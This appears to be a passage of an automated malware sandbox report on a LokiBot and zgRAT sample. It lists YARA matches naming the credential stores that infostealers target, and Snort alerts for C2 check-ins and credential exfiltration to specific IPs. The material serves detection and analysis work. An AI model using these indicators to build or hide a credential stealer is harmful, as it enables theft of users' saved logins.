9.0.ZciowjM9hN.exe.400000.8.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.ZciowjM9hN.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.ZciowjM9hN.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.ZciowjM9hN.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.ZciowjM9hN.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.ZciowjM9hN.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.ZciowjM9hN.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZciowjM9hN.exe.3beb450.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.ZciowjM9hN.exe.3beb450.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ZciowjM9hN.exe.3beb450.6.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.ZciowjM9hN.exe.3beb450.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.10.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.10.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.10.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.10.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.10.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.14.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
9.0.ZciowjM9hN.exe.400000.14.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.14.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.14.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.14.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.14.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.14.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.14.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.14.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.14.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.14.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.14.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.14.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZciowjM9hN.exe.3c05470.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
0.2.ZciowjM9hN.exe.3c05470.7.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ZciowjM9hN.exe.3c05470.7.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.ZciowjM9hN.exe.3c05470.7.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
9.0.ZciowjM9hN.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.6.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.6.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZciowjM9hN.exe.7470000.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x51d3f:$s1: file:/// 0x51c4f:$s2: {11111-22222-10009-11112} 0x51ccf:$s3: {11111-22222-50001-00000} 0x4f119:$s4: get_Module 0x4f55f:$s5: Reverse 0x5157e:$s6: BlockCopy 0x513c2:$s7: ReadByte 0x51d51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.0.ZciowjM9hN.exe.400000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.3.ZciowjM9hN.exe.3dafef0.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x4ff3f:$s1: file:/// 0x4fe4f:$s2: {11111-22222-10009-11112} 0x4fecf:$s3: {11111-22222-50001-00000} 0x4d319:$s4: get_Module 0x4d75f:$s5: Reverse 0x4f77e:$s6: BlockCopy 0x4f5c2:$s7: ReadByte 0x4ff51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.3.ZciowjM9hN.exe.3dafef0.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x51d3f:$s1: file:/// 0x51c4f:$s2: {11111-22222-10009-11112} 0x51ccf:$s3: {11111-22222-50001-00000} 0x4f119:$s4: get_Module 0x4f55f:$s5: Reverse 0x5157e:$s6: BlockCopy 0x513c2:$s7: ReadByte 0x51d51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.3.ZciowjM9hN.exe.3d39ed0.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x51d3f:$s1: file:/// 0xc7d5f:$s1: file:/// 0x51c4f:$s2: {11111-22222-10009-11112} 0xc7c6f:$s2: {11111-22222-10009-11112} 0x51ccf:$s3: {11111-22222-50001-00000} 0xc7cef:$s3: {11111-22222-50001-00000} 0x4f119:$s4: get_Module 0xc5139:$s4: get_Module 0x4f55f:$s5: Reverse 0xc557f:$s5: Reverse 0x5157e:$s6: BlockCopy 0xc759e:$s6: BlockCopy 0x513c2:$s7: ReadByte 0xc73e2:$s7: ReadByte 0x51d51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0xc7d71:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 101 entries

Snort Signatures

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649751802021641 06/09/22-12:18:53.097950
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749800802024313 06/09/22-12:20:00.829408
SID:	2024313
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749774802825766 06/09/22-12:19:21.474099
SID:	2825766
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649824802024313 06/09/22-12:20:22.688767
SID:	2024313
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749810802024313 06/09/22-12:20:16.253890
SID:	2024313
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649820802825766 06/09/22-12:20:20.867617
SID:	2825766
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749770802021641 06/09/22-12:19:14.041674
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749785802021641 06/09/22-12:19:42.634597
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749773802024313 06/09/22-12:19:20.082461
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749767802021641 06/09/22-12:19:08.800960
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749844802025381 06/09/22-12:20:27.377021
SID:	2025381
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749752802021641 06/09/22-12:18:54.883061
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749793802021641 06/09/22-12:19:50.509118
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649776802021641 06/09/22-12:19:23.957128
SID:	2021641
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749799802025381 06/09/22-12:19:59.356295
SID:	2025381
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749804802021641 06/09/22-12:20:07.542975
SID:	2021641
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749782802025381 06/09/22-12:19:30.781711
SID:	2025381
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649764802024313 06/09/22-12:19:02.212367
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749798802024313 06/09/22-12:19:58.002191
SID:	2024313
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749799802825766 06/09/22-12:19:59.356295
SID:	2825766
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749745802024312 06/09/22-12:18:46.752225
SID:	2024312
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649820802025381 06/09/22-12:20:20.867617
SID:	2025381
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749782802825766 06/09/22-12:19:30.781711
SID:	2825766
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749766802025381 06/09/22-12:19:06.967493
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649775802025381 06/09/22-12:19:22.604146
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749783802024313 06/09/22-12:19:36.273915
SID:	2024313
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749772802025381 06/09/22-12:19:18.470177
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749797802825766 06/09/22-12:19:56.597737
SID:	2825766
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649792802024313 06/09/22-12:19:45.858683
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749817802024313 06/09/22-12:20:18.206399
SID:	2024313
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649778802025381 06/09/22-12:19:26.733758
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749748802825766 06/09/22-12:18:50.155870
SID:	2825766
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649801802021641 06/09/22-12:20:02.469935
SID:	2021641
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749803802025381 06/09/22-12:20:05.555366
SID:	2025381
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749761802024313 06/09/22-12:18:59.590864
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749779802025381 06/09/22-12:19:28.006927
SID:	2025381
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749796802024313 06/09/22-12:19:54.857506
SID:	2024313
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749807802021641 06/09/22-12:20:13.436189
SID:	2021641
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749784802825766 06/09/22-12:19:39.004620
SID:	2825766
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

